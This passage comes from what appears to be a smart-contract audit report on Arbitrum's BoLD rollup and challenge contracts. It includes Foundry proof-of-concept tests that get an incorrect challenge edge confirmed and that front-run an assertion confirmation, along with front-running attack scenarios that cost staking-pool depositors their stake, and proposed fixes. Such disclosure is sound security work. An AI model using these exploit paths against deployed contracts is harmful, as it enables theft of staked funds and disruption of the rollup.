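    # end_root deliberately excluded: rivals differ only in end_root
    return h(edge["origin"], str(edge["level"]), edge["start_root"])

honest = {"origin": "o", "level": 1, "start_root": "s", "end_root": "honest"}
rival  = {"origin": "o", "level": 1, "start_root": "s", "end_root": "evil"}

# a claiming edge one level below, whose originId was derived from the
# honest edge's mutualId
claiming = {"origin_id": mutual_id(honest), "level": 2}

def check_claim_id_link(edge: dict, claiming_edge: dict) -> bool:
    return (mutual_id(edge) == claiming_edge["origin_id"]
            and edge["level"] + 1 == claiming_edge["level"])

print(check_claim_id_link(honest, claiming))  # True: the intended link
print(check_claim_id_link(rival, claiming))   # True: the dishonest rival also passes
```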

PoC

The PoC below demonstrates the inheritance of the timer from the honest tree by an edge in the dishonest tree and the confirmation of the dishonest challenge edge as a result. The challenge progresses to the last level of level 1 (the first subchallenge).

Run the PoC below with the command:

forge test --match-contract Playground --match-test testConfirmIncorrectEdge

pragma solidity ^0.8.17;

import "forge-std/Test.sol";
import "./Utils.sol";
import "../MockAssertionChain.sol";
import "../../src/challengeV2/EdgeChallengeManager.sol";
import "@openzeppelin/contracts/proxy/transparent/TransparentUpgradeableProxy.sol";
import "@openzeppelin/contracts/proxy/transparent/ProxyAdmin.sol";
import "../ERC20Mock.sol";
import "./StateTools.sol";
import "forge-std/console.sol";

import "./EdgeChallengeManager.t.sol";

contract Playground is EdgeChallengeManagerTest {
    function testConfirmIncorrectEdge() public {
        EdgeInitData memory ei = deployAndInit();
        (
            bytes32[] memory blockStates1,
            bytes32[] memory blockStates2,
            BisectionChildren[6] memory blockEdges1,
            BisectionChildren[6] memory blockEdges2
        ) = createBlockEdgesAndBisectToFork(
            CreateBlockEdgesBisectArgs(
                ei.challengeManager,
                ei.a1,
                ei.a2,
                ei.a1State,
                ei.a2State,
                false,
                a1RandomStates,
                a1RandomStatesExp,
                a2RandomStates,
                a2RandomStatesExp
            )
        );

        // bisection of level 1, last bisection for winning edge is unrivalled
        BisectionData memory bsbd = createMachineEdgesAndBisectToFork(
            CreateMachineEdgesBisectArgs(
                ei.challengeManager,
                1,
                blockEdges1[0].lowerChildId,
                blockEdges2[0].lowerChildId,
                blockStates1[1],
                blockStates2[1],
                true,
                ArrayUtilsLib.slice(blockStates1, 0, 2),
                ArrayUtilsLib.slice(blockStates2, 0, 2)
            )
        );

        // allow unrivalled timer to tick up for winning leaf
        _safeVmRoll(block.number + challengePeriodBlock);

        // update timer of level 1 unrivalled winning leaf
        ei.challengeManager.updateTimerCacheByChildren(bsbd.edges1[0].lowerChildId);

        ChallengeEdge memory winningEdge = ei.challengeManager.getEdge(bsbd.edges1[0].lowerChildId);
        ChallengeEdge memory losingRival = ei.challengeManager.getEdge(blockEdges2[0].lowerChildId);

        console.log("Losing rival timer before update:", losingRival.totalTimeUnrivaledCache);

        // inherit timer from level 1 winning leaf to level 0 losing rival
        ei.challengeManager.updateTimerCacheByClaim(
            blockEdges2[0].lowerChildId, 
            bsbd.edges1[0].lowerChildId
        );
        
        losingRival = ei.challengeManager.getEdge(blockEdges2[0].lowerChildId);
        console.log("Losing rival timer after update:", losingRival.totalTimeUnrivaledCache);

        // update timer of level 0 unrivalled losing upper child
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[0].upperChildId);
        console.log("Losing upper timer unrivalled:", ei.challengeManager.timeUnrivaled(blockEdges2[0].upperChildId));

        // propagate timers upwards to the incorrect assertion from the losing children
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[1].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[1].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[2].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[2].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[3].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[3].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[4].lowerChildId);
        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[4].upperChildId);

        ei.challengeManager.updateTimerCacheByChildren(blockEdges2[5].lowerChildId);

        assertEq(
            ei.challengeManager.getEdge(blockEdges2[5].lowerChildId).totalTimeUnrivaledCache,
            challengePeriodBlock 
        );

        // confirm the edge for the incorrect assertion
        ei.challengeManager.confirmEdgeByTime(blockEdges2[5].lowerChildId, ei.a1Data);

        assertTrue(
            ei.challengeManager.getEdge(blockEdges2[5].lowerChildId).status == EdgeStatus.Confirmed
        );
    }
}

Tools Used

Manual Review

Recommended Mitigation Steps

Allow child edges (from bisection) to inherit the claimId of their parent, and check that the claimId of the claiming edge matches the edgeId of the inheriting edge (this would require changes to isLayerZeroEdge).
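A rough sketch of the suggested check, assuming claimId is propagated from parent to children during bisection (the function shape and storage layout here are illustrative, not the actual EdgeChallengeManagerLib code):

```solidity
// Illustrative only: enforce that the claiming edge explicitly claims the
// inheriting edge, rather than merely sharing an originId with its mutualId.
function updateTimerCacheByClaim(
    EdgeStore storage store,
    bytes32 edgeId,
    bytes32 claimingEdgeId
) internal {
    // existing checks: the claiming edge must be exactly one level below and
    // its originId must match the inheriting edge's mutualId
    // ...
    // additional check: with claimId inherited through bisection, only
    // descendants of the layer zero edge that actually claims this edge
    // can pass, so rivals of the inheriting edge are rejected
    require(
        store.edges[claimingEdgeId].claimId == edgeId,
        "claiming edge does not claim this edge"
    );
    // ... update the timer cache as before
}
```

This keeps the existing originId/mutualId checks and adds a direct claimId link, so an edge in the dishonest rival tree can no longer borrow the honest tree's timer.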

Assessed type

Invalid Validation

Griefing Attack Possible Where Validator Will Lose Their Stake

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L40
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/EdgeStakingPool.sol#L44

Vulnerability details

Proof of Concept

Flow

  1. Create a Pool: Any validator can use the createPool function to create a new AssertionStakingPool.
File: AssertionStakingPoolCreator.sol

    function createPool(
        address _rollup,
        bytes32 _assertionHash
    ) external returns (IAssertionStakingPool) {
        AssertionStakingPool assertionPool = new AssertionStakingPool{salt: 0}(_rollup, _assertionHash);
        emit NewAssertionPoolCreated(_rollup, _assertionHash, address(assertionPool));
        return assertionPool;
    }
  2. Deposit Tokens: Validators deposit tokens into the staking pool using the depositIntoPool function.
File: AbsBoldStakingPool.sol

    function depositIntoPool(uint256 amount) external {
        if (amount == 0) {
            revert ZeroAmount();
        }

        depositBalance[msg.sender] += amount;
        IERC20(stakeToken).safeTransferFrom(msg.sender, address(this), amount);

        emit StakeDeposited(msg.sender, amount);
    }
  3. Create Assertions: Using the deposited tokens, validators can create new assertions with the createAssertion function.
File: AssertionStakingPool.sol

    function createAssertion(AssertionInputs calldata assertionInputs) external {
        uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
        // approve spending from rollup for newStakeOnNewAssertion call
        IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
        // reverts if pool doesn't have enough stake and if assertion has already been asserted
        IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
    }

Important things to note about this function

  • No access control in createAssertion.

  • The required stake tokens are directly approved and transferred without verifying the caller's authorization.

Griefing Attack Scenario

  1. Alice creates a new AssertionStakingPool and deposits X tokens.

  2. Attacker frontruns Alice by calling createAssertion with incorrect assertionInputs.

  3. Alice unknowingly becomes a malicious validator due to the incorrect assertion and loses her stake.

A similar situation arises in the EdgeStakingPool contract when creating a new edge through the createEdge function.

  1. Alice creates a new EdgeStakingPool and deposits X tokens.

  2. Attacker frontruns Alice by calling createEdge with incorrect CreateEdgeArgs.

  3. Alice unknowingly becomes a malicious party due to the incorrect edge and loses her stake.

Impact

Validators can lose their stake due to incorrect assertions being made on their behalf.

Tools Used

VS Code

Recommended Mitigation Steps

Implement access control to ensure that only the validator who deposited the tokens can create assertions or edges.

File: AssertionStakingPool.sol

    function createAssertion(AssertionInputs calldata assertionInputs) external {
        uint256 requiredStake = assertionInputs.beforeStateData.configData.requiredStake;
+       require(depositBalance[msg.sender] >= requiredStake);
        // approve spending from rollup for newStakeOnNewAssertion call
        IERC20(stakeToken).safeIncreaseAllowance(rollup, requiredStake);
        // reverts if pool doesn't have enough stake and if assertion has already been asserted
        IRollupUser(rollup).newStakeOnNewAssertion(requiredStake, assertionInputs, assertionHash, address(this));
    }
File: EdgeStakingPool.sol

    function createEdge(CreateEdgeArgs calldata args) external {
        uint256 requiredStake = EdgeChallengeManager(challengeManager).stakeAmounts(args.level);
+       require(depositBalance[msg.sender] >= requiredStake);
        IERC20(stakeToken).safeIncreaseAllowance(address(challengeManager), requiredStake);
        bytes32 newEdgeId = EdgeChallengeManager(challengeManager).createLayerZeroEdge(args);
        if (newEdgeId != edgeId) {
            revert IncorrectEdgeId(newEdgeId, edgeId);
        }
    }

Assessed type

Invalid Validation

`sequencerBatchAcc` has an incorrect value in `RollupCore`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L471

Vulnerability details

Impact

In the current implementation of the RollupCore contract, the createNewAssertion() function is used to create new assertions. The new assertion includes several parameters, among them the hash of the previous assertion, the after state, and the sequencer inbox accumulator value. The problem is that when determining the sequencerInboxAcc value, the function uses afterInboxPosition, which indicates how many messages the next assertion should process, instead of currentInboxPosition, which indicates how many messages this assertion has processed (the value the sequencer accumulator should represent).

Proof of Concept

Let's say 200 messages were added to the inbox, so that currentInboxPosition is equal to 200 (at the time the assertion was created):

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L436

  uint256 currentInboxPosition = bridge.sequencerMessageCount();

Then the function fetches the inbox position from the assertion's after state, which accounts for new messages that may have been added to the inbox since the last assertion:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L450

uint256 afterInboxPosition = afterGS.getInboxPosition();

The problem is that the sequencer accumulator should represent how many messages this assertion has processed, not how many the next assertion should process:

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L471

sequencerBatchAcc = bridge.sequencerInboxAccs(afterInboxPosition - 1);

Tools Used

Manual review.

Recommended Mitigation Steps

Use currentInboxPosition instead of afterInboxPosition when assigning the value of the sequencer accumulator.
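Applied to createNewAssertion, the warden's suggested change would look roughly like the following diff (a sketch only; surrounding code omitted):

```
-       sequencerBatchAcc = bridge.sequencerInboxAccs(afterInboxPosition - 1);
+       sequencerBatchAcc = bridge.sequencerInboxAccs(currentInboxPosition - 1);
```

In the 200-message example above, this would pin the accumulator to index 199 (the last message actually in the inbox at creation time) rather than an index derived from the after state's claimed position.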

Assessed type

Other

Upgrades to EdgeChallengeManager changing staking requirement can cause `funds loss`

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L429
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/EdgeChallengeManager.sol#L580

Vulnerability details

Because EdgeChallengeManager.sol is upgradeable, an Admin upgrading the contract to update stakeToken and/or stakeAmounts would have critical consequences.

This report is related to TOB-ARBCH-31 from the TrailOfBits audit, which was identified as Informational. Readers should review that finding before continuing, for proper context. This report provides additional information on how this would have critical impacts, which increases the severity of the original finding, and on how the current contract doesn't prevent an Admin from performing such an upgrade. Coupled with the fact that not all team members seem to be fully aware of this (see the Discord discussion in the last section), this seems to warrant Medium severity overall.

Impacts (stakeAmounts)

An upgrade implying a change in the staking requirement would be problematic (using WETH as the stakeToken):

  1. No stake required --> 100 WETH stake required: A user who created a layer zero edge before the upgrade may be refunded 100 WETH after the upgrade even though they staked nothing at edge creation (see PoC).
  2. 50 WETH stake required --> 100 WETH stake required: Very similar to impact 1. A user who created a layer zero edge before the upgrade may be refunded 100 WETH (instead of the 50 WETH they staked), gaining the difference between the new and old stake requirements. This impact is the most likely to occur in production.
  3. 100 WETH stake required --> 50 WETH stake required: A user who created a layer zero edge before the upgrade will not be refunded their 100 WETH even though they staked that amount at edge creation, since the contract will now refund only the new value of 50 WETH, half of the original.
  4. 100 WETH stake required --> no stake required: A user who created a layer zero edge before the upgrade will not be refunded their 100 WETH at all, even though they staked that amount at edge creation, since the contract will now skip the transfer entirely.
    function refundStake(bytes32 edgeId) public {
        ChallengeEdge storage edge = store.get(edgeId);
        // setting refunded also do checks that the edge cannot be refunded twice
        edge.setRefunded();

        IERC20 st = stakeToken;
        uint256 sa = stakeAmounts[edge.level];
        // no need to refund with the token or amount where zero'd out
        if (address(st) != address(0) && sa != 0) {                                // <------------------------- THIS condition will SKIP the transfer, as identified also in the TrailOfBits audit
            st.safeTransfer(edge.staker, sa);
        }

        emit EdgeRefunded(edgeId, store.edges[edgeId].mutualId(), address(st), sa);
    }

Impacts (stakeToken)

  1. address(0) --> WETH: Same as Impact #1.
  2. WETH --> address(0): Same as Impact #4.
  3. WETH --> WBTC: This is fine for direct users, but catastrophic for pool users: switching to a new token breaks the staking pool logic (both assertion and edge pools), and users participating in such a pool would lose their entire stake. Since the stakeToken is stored at pool creation (e.g. WETH), when the EdgeChallengeManager is upgraded to a new stakeToken (e.g. WBTC), the new tokens are still transferred to the pool contract on refund/withdrawal, but they are stuck there forever: the safeTransfer in withdrawFromPool fails because it tries to transfer the original token (WETH) while the contract now only holds the new one (WBTC).
    function withdrawFromPool(uint256 amount) public {
        if (amount == 0) {
            revert ZeroAmount();
        }
        uint256 balance = depositBalance[msg.sender];
        if (amount > balance) {
            revert AmountExceedsBalance(msg.sender, amount, balance);
        }

        depositBalance[msg.sender] = balance - amount;
        IERC20(stakeToken).safeTransfer(msg.sender, amount); // <--- THIS will fail as the contract will not own any WETH, but WBTC
        
        emit StakeWithdrawn(msg.sender, amount);
    }

Be aware that all the mentioned impacts also affect EdgeStakingPool contract users, who could ultimately represent Alice or Bob in the following PoC. There is a twist though: in the case of Impact #2, any additional tokens transferred to the EdgeStakingPool would be stuck in it forever, because depositIntoPool and withdrawFromPool are limited to the amounts that were accounted for, breaking the developer's assumption below.

///         Tokens sent directly to this contract will be lost.
///         It is assumed that the challenge manager will not return more tokens than the amount deposited by the pool.
///         Any tokens exceeding the deposited amount to the pool will be stuck in the pool forever.

Proof of Concept

This showcases Impact 1. Three actors are in play: Admin, Alice, and Bob.

  1. The Admin deploys the ECM contract with no stake required to create a layer zero edge.
  2. Alice decides to create a challenge by calling ECM::createLayerZeroEdge; no tokens are transferred since it is stake free.
  3. Afterwards (but before Alice's challenge completes), the Admin upgrades the contract to change the staking requirement, now requiring 100 WETH to create a layer zero edge.
  4. Bob decides to create a layer zero edge for a different claim/assertion (so not a rival of Alice's edge).
  5. Once Alice's challenge period has completed, she confirms her claim and then calls ECM::refundStake. Even though she staked no tokens, the ECM sends her 100 WETH, and since the contract only owns the 100 WETH staked by Bob in the previous step, this effectively steals Bob's stake. (user funds loss)
  6. Once Bob's claim is confirmed later on (assuming he wins his claim/assertion too), his call to ECM::refundStake is an unpleasant surprise: it reverts because the contract lacks funds. (protocol insolvency)

Recommended Mitigation Steps

If an upgrade of the stakeToken and/or stakeAmounts is required, a normal upgrade can't be used; only a complete redeployment, which also replaces the proxy (so the old storage is not reused) and is made official afterwards with RollupAdminLogic::setChallengeManager, is safe. That should be documented very clearly and explicitly, as the current setup has the potential to break things down the road; the proper fix would be to make those state variables immutable, which would prevent this completely.

Otherwise, you could track the staked amount/token inside the ChallengeEdge struct instead of keeping a single global value, and integrate it properly into the ECM; that should allow normal upgrades. A draft implementation follows.

struct ChallengeEdge {
    ... // omitting to save space
	
    uint8 level;
    /// @notice Set to true when the staker has been refunded. Can only be set to true if the status is Confirmed
    ///         and the staker is non zero.
    bool refunded;
+   /// @notice The amount staked for this edge.
+   ///         Only populated on zero layer edges
+   uint256 stakedAmount;
+   /// @notice The token staked.
+   ///         Only populated on zero layer edges
+   address stakeToken;    
    /// @notice TODO
    uint64 totalTimeUnrivaledCache;
}
    function refundStake(bytes32 edgeId) public {
        ChallengeEdge storage edge = store.get(edgeId);
        // setting refunded also do checks that the edge cannot be refunded twice
        edge.setRefunded();

-       IERC20 st = stakeToken;
-       uint256 sa = stakeAmounts[edge.level];
+       IERC20 st = edge.stakeToken;
+       uint256 sa = edge.stakedAmount;
        // no need to refund with the token or amount where zero'd out
        if (address(st) != address(0) && sa != 0) {
            st.safeTransfer(edge.staker, sa);
        }

        emit EdgeRefunded(edgeId, store.edges[edgeId].mutualId(), address(st), sa);
    }

Discord private discussion

Here is a snapshot of my discussion with godzillaba. As I interpret it, the phrase "i believe the standard procedure" suggests it is not 100% clear that a normal upgrade can't be done for staking requirements.

dontonka — 05/18/2024 8:10 PM
Reminder: this is a private channel.

Since EdgeChallengeManager is an upgradable contract and based on the following comment. The following secnarios are possible?
        // The contract initializer can disable staking by setting zeros for token or amount, to change
        // this a new challenge manager needs to be deployed and its address updated in the assertion chain
        if (address(st) != address(0) && sa != 0) {


Initial deployment (t0): stakeToken == address(0), stakeAmounts with valid values. So this means mini-bond free to create edges.
Upgrade One (t0 + 5 days) : stakeToken is now valid and stakeAmounts remains the same. So this means there is a mini-bond cost to create an edge.
Upgrade Two (t0 + 30 days): stakeToken remains the same, but stakeAmounts are increased as they were too low (all the levels).
Upgrade Three (t0 + 90 days): stakeToken is changed to another token (WETH --> WBTC), and stakeAmounts are adjusted downward as asset is worth more.
 
godzillaba — 05/19/2024 2:43 PM
this sounds possible, yes. although i believe the standard procedure for upgrades and parameter updates of the challenge manager will be to actually deploy an entirely new version and call RollupAdminLogic::setChallengeManager

Assessed type

Upgradable

Staker's funds might be stuck in the rollup contract if `forceCreateAssertion` is used

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupAdminLogic.sol#L237-L256

Vulnerability details

Impact

If a wrong assertion has been created in the rollup contract, calling forceCreateAssertion will not transfer the "bad" assertion's stake to the loserStakeEscrow; instead, it will remain in the rollup contract forever.

Proof of Concept

The rollup contract assumes that there can only be one correct assertion. Therefore, it transfers the stake of every subsequent child into the loserStakeEscrow, since bad assertion stakers cannot withdraw.

    function stakeOnNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
        public
        onlyValidator
        whenNotPaused
    {
        ---SNIP---

        if (!getAssertionStorage(newAssertionHash).isFirstChild) {
            // We assume assertion.beforeStateData is valid here as it will be validated in createNewAssertion
            // only 1 of the children can be confirmed and get their stake refunded
            // so we send the other children's stake to the loserStakeEscrow
            // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
>>          IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
        }
    }

However, in one case, this doesn't happen. Consider the following scenario:

  1. Alice creates and stakes tokens for the wrong assertion, and they remain in the rollup contract.
  2. The admin calls forceCreateAssertion to create a correct assertion and confirms it.
    function forceCreateAssertion(
        bytes32 prevAssertionHash,
        AssertionInputs calldata assertion,
        bytes32 expectedAssertionHash
    ) external override whenPaused {
        // To update the wasm module root in the case of a bug:
        // 0. pause the contract
        // 1. update the wasm module root in the contract
        // 2. update the config hash of the assertion after which you wish to use the new wasm module root (functionality not written yet)
        // 3. force refund the stake of the current leaf assertion(s)
        // 4. create a new assertion using the assertion with the updated config has as a prev
        // 5. force confirm it - this is necessary to set latestConfirmed on the correct line
        // 6. unpause the contract

        // Normally, a new assertion is created using its prev's confirmPeriodBlocks
        // in the case of a force create, we use the rollup's current confirmPeriodBlocks
>>      createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash);

        emit OwnerFunctionCalled(23);
    }

    function forceConfirmAssertion(
        bytes32 assertionHash,
        bytes32 parentAssertionHash,
        AssertionState calldata confirmState,
        bytes32 inboxAcc
    ) external override whenPaused {
        // this skip deadline, prev, challenge validations
        confirmAssertionInternal(assertionHash, parentAssertionHash, confirmState, inboxAcc);
        emit OwnerFunctionCalled(24);
    }

Note that the funds are not transferred to the escrow, even though the new assertion is a second child. The forceCreateAssertion comments mention a force refund of the stakers, but Alice can't be refunded due to the requireInactiveStaker condition. As a result, Alice's stake will be stuck in the rollup contract.

There is a function called fastConfirmNewAssertion, similar to forceCreateAssertion, which does transfer the stake when the new assertion is a second child.

    function fastConfirmNewAssertion(AssertionInputs calldata assertion, bytes32 expectedAssertionHash)
        external
        whenNotPaused
    {
        ---SNIP--- 
        if (status == AssertionStatus.NoAssertion) {
            // If not exists, we create the new assertion
            (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertion, expectedAssertionHash);
            if (!getAssertionStorage(newAssertionHash).isFirstChild) {
                // only 1 of the children can be confirmed and get their stake refunded
                // so we send the other children's stake to the loserStakeEscrow
                // NOTE: if the losing staker have staked more than requiredStake, the excess stake will be stuck
>>              IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
            }
        }

Tools Used

Manual review

Recommended Mitigation Steps

Consider transferring tokens to the loser escrow in forceCreateAssertion, as is done in the fastConfirmNewAssertion function.

    function forceCreateAssertion(
        bytes32 prevAssertionHash,
        AssertionInputs calldata assertion,
        bytes32 expectedAssertionHash
    ) external override whenPaused {
+       (bytes32 newAssertionHash,) = createNewAssertion(assertion, prevAssertionHash, expectedAssertionHash);
+       if (!getAssertionStorage(newAssertionHash).isFirstChild) {
+           IERC20(stakeToken).safeTransfer(loserStakeEscrow, assertion.beforeStateData.configData.requiredStake);
+       }
        emit OwnerFunctionCalled(23);
    }

Assessed type

Other

Validator AFK timer is ticking even when the rollup contract is paused

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L51-L60
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L71-L75

Vulnerability details

Impact

The rollup contract allows the validator whitelist to be disabled unintentionally, because time during which the rollup contract was paused is included in the validator AFK calculation.

Proof of Concept

The RollupUserLogic.sol contract contains a function that allows the whitelist to be disabled, thereby allowing any user to create and confirm assertions.

    function removeWhitelistAfterValidatorAfk() external {
        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
>>      require(_validatorIsAfk(), "VALIDATOR_NOT_AFK");
        validatorWhitelistDisabled = true;
    }

One of the conditions for disabling the whitelist is that the validators must be AFK for 201600 blocks, meaning no new assertions were created during this time.

    function _validatorIsAfk() internal view returns (bool) {
        AssertionNode memory latestConfirmedAssertion = getAssertionStorage(latestConfirmed());
        if (latestConfirmedAssertion.createdAtBlock == 0) return false;
        // We consider the validator is gone if the last known assertion is older than VALIDATOR_AFK_BLOCKS
        // Which is either the latest confirmed assertion or the first child of the latest confirmed assertion
        if (latestConfirmedAssertion.firstChildBlock > 0) {
>>          return latestConfirmedAssertion.firstChildBlock + VALIDATOR_AFK_BLOCKS < block.number;
        }
>>      return latestConfirmedAssertion.createdAtBlock + VALIDATOR_AFK_BLOCKS < block.number;
    }

However, while the rollup contract is paused, validators cannot create new assertions. The timer can therefore run out, allowing users to call the removeWhitelistAfterValidatorAfk function and disable the whitelist.

Tools Used

Manual review

Recommended Mitigation Steps

Consider taking into account the time that the contract was in a paused state during the validator AFK calculation.
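One way to do this (a sketch with hypothetical names; `totalPausedBlocks` and the pause-hook overrides are not part of the existing contracts) is to accumulate the number of blocks spent paused and extend the AFK deadline accordingly:

```solidity
// Hypothetical pause-time accounting for the AFK calculation
uint256 internal pauseStartBlock;
uint256 public totalPausedBlocks;

function pause() external override onlyOwner {
    // record when the pause began
    pauseStartBlock = block.number;
    _pause();
}

function resume() external override onlyOwner {
    // credit the paused interval before resuming
    totalPausedBlocks += block.number - pauseStartBlock;
    _unpause();
}

function _validatorIsAfk() internal view returns (bool) {
    AssertionNode memory latestConfirmedAssertion = getAssertionStorage(latestConfirmed());
    if (latestConfirmedAssertion.createdAtBlock == 0) return false;
    // extend the AFK window by the total time the contract spent paused
    uint256 afkWindow = VALIDATOR_AFK_BLOCKS + totalPausedBlocks;
    if (latestConfirmedAssertion.firstChildBlock > 0) {
        return latestConfirmedAssertion.firstChildBlock + afkWindow < block.number;
    }
    return latestConfirmedAssertion.createdAtBlock + afkWindow < block.number;
}
```

A refinement would also be needed for an ongoing pause (e.g. treating the current pause interval as paused time inside `_validatorIsAfk`), since the sketch above only credits completed pauses.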

Assessed type

Timing

`confirmAssertion()` can be DoSed

Lines of code

https://github.com/OffchainLabs/bold/blob/0420b9ddb88f71f5e86ca1b3bc256c09346b8315/contracts/src/rollup/RollupUserLogic.sol#L115

Vulnerability details

Impact

Confirmation of an honest assertion can be DoSed after the delay period when a malicious validator front-runs confirmAssertion() to post a malicious assertion.

By design, an honest validator should be able to confirm an assertion and withdraw their bond if there is no rival sibling after the delay period (1 week).

However, the check for a rival sibling is incomplete and allows posting a rival after the delay period has passed.

The implication is that the honest validator then has to find funds to create a challenge edge (which can be confirmed by time).

Due to the large bond required to create an assertion, the honest validator might have created an assertion pool to raise funds for the assertion; with this development, the honest participant must additionally source funds to create an edge before the assertion can be confirmed.

Proof of Concept

The check for a rival sibling does not take timing into account.

  1. Alice creates a valid assertion
  2. After delay period is passed, no counter assertion.
  3. Alice tries to confirm her assertion, but Bob front-runs her with a rival assertion; Alice's transaction reverts, since no winning edge was provided.
@> if (prevAssertion.secondChildBlock > 0 ) { //@audit-issue  
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Paste the following testSuccessConfirmUnchallengedAssertions() into Rollup.t.sol:

    function testSuccessConfirmUnchallengedAssertions() public returns (bytes32, AssertionState memory, uint64) {
        (bytes32 assertionHash, AssertionState memory state, uint64 inboxcount) = testSuccessCreateAssertion();
        vm.roll(userRollup.getAssertion(genesisHash).firstChildBlock + CONFIRM_PERIOD_BLOCKS + 1);
        bytes32 inboxAccs = userRollup.bridge().sequencerInboxAccs(0);

        //Frontrun Confirmation with invalid assertion that has same parent with assertion to be confirmed
        //uint64 inboxcount = uint64(_createNewBatch());
        AssertionState memory beforeState;
        beforeState.machineStatus = MachineStatus.FINISHED;
        AssertionState memory afterState;
        afterState.machineStatus = MachineStatus.FINISHED;
        afterState.globalState.bytes32Vals[0] = keccak256("FIRST_ASSERTION_BLOCKHASH_A_WRONG_VALUE"); // blockhash
        afterState.globalState.bytes32Vals[1] = keccak256("FIRST_ASSERTION_SENDROOT_A_WRONG_VALUE"); // sendroot
        afterState.globalState.u64Vals[0] = 1; // inbox count
        afterState.globalState.u64Vals[1] = 0; // pos in msg

        bytes32 expectedAssertionHash = RollupLib.assertionHash({
            parentAssertionHash: genesisHash,
            afterState: afterState,
            inboxAcc: userRollup.bridge().sequencerInboxAccs(0)
        });

        vm.prank(validator2);
        userRollup.newStakeOnNewAssertion({
            tokenAmount: BASE_STAKE,
            assertion: AssertionInputs({
                beforeStateData: BeforeStateData({
                    sequencerBatchAcc: bytes32(0),
                    prevPrevAssertionHash: bytes32(0),
                    configData: ConfigData({
                        wasmModuleRoot: WASM_MODULE_ROOT,
                        requiredStake: BASE_STAKE,
                        challengeManager: address(challengeManager),
                        confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                        nextInboxPosition: afterState.globalState.u64Vals[0]
                    })
                }),
                beforeState: beforeState,
                afterState: afterState
            }),
            expectedAssertionHash: expectedAssertionHash,
            withdrawalAddress: validator2Withdrawal
        });

        vm.prank(validator1);
        userRollup.confirmAssertion(
            assertionHash,
            genesisHash,
            firstState,
            bytes32(0),
            ConfigData({
                wasmModuleRoot: WASM_MODULE_ROOT,
                requiredStake: BASE_STAKE,
                challengeManager: address(challengeManager),
                confirmPeriodBlocks: CONFIRM_PERIOD_BLOCKS,
                nextInboxPosition: firstState.globalState.u64Vals[0]
            }),
            inboxAccs
        );
        return (assertionHash, state, inboxcount);
    }

The test reverts with the following error:

Failing tests:
Encountered 1 failing test in test/Rollup.t.sol:RollupTest
[FAIL. Reason: EdgeNotExists(0x0000000000000000000000000000000000000000000000000000000000000000)] testSuccessConfirmUnchallengedAssertions() (gas: 662856)

Tools Used

Manual review and foundry.

Recommended Mitigation Steps

---   if (prevAssertion.secondChildBlock > 0 ) { 
+++   if (prevAssertion.secondChildBlock > 0 && prevAssertion.firstChildBlock + prevConfig.confirmPeriodBlocks > prevAssertion.secondChildBlock) { 
            // if the prev has more than 1 child, check if this assertion is the challenge winner
            ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
            require(winningEdge.claimId == assertionHash, "NOT_WINNER");
            require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
            require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
            // an additional number of blocks is added to ensure that the result of the challenge is widely
            // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
            // always be challengeGracePeriodBlocks before an assertion can be confirmed
            require(
                block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
                "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
            );
        }

Assessed type

DoS

If an edge or assertion gets slashed, some depositors to the stakingPool will be cheated.

